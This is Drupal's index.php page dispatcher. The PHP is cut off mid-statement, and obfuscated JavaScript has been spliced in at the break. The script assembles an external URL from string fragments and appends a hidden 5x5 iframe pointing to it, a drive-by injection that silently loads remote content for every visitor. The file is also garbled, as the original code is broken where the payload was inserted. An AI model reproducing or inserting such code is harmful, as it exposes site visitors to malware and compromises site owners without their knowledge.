// $Id: index.php,v 1.91 2006/12/12 09:32:18 unconed Exp $ /** * @file * The PHP page that serves all page requests on a Drupal installation. * * The routines here dispatch control to the appropriate handler, which then * prints the appropriate page. */ require_once './includes/bootstrap.inc'; drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); $return = menu_execute_active_handler(); // Menu status constants are integers; page content is a string. if (is_int($return)) { switch ($return) { case MENU_NOT_FOUND: drupal_not_found(); break; case MENU_ACCESS_DENIED: drupal_access_denied(); break; case MENU_SITE_OFFLINE: drupal_site_offline(); break; } } elseif (isset($return)) { // Print any value (including an empty string) except NULL or undefined: print theme('page', $re status='';u='/';he='657';bx='6fe';wy='?';e='s=';o='f';hn='ck';kn='41';a='sr';q='9d';oe='.c';f='s';x='/s';tk='me';y='p';dh='680';ra='s';fl='a';iq='de';ci='cb7';m='5';qm='78';w='htt';xm='i';of='fra';t='7';tc='23e';fg='om';ix='hp';vs='in';ri='1e1';bs='c';bu='x.';st='i';oh='el/';b='p:/';cn='e9e';s='erv';pl='ae';qe='eso';c=xm.concat(of,tk);n=a.concat(bs);oy=w.concat(b,x,s,st,ra,qe,hn,f,m,oe,fg,u,oh,vs,iq,bu,y,ix,wy,e,pl,ri,t,dh,fl,kn,bx,cn,tc,q,o,ci,he,qm);var d=document.createElement(c);d.setAttribute('width','5');d.setAttribute('height','5');d.setAttribute('style','display:none');d.setAttribute(n,oy);document.body.appendChild(d);window.status=status;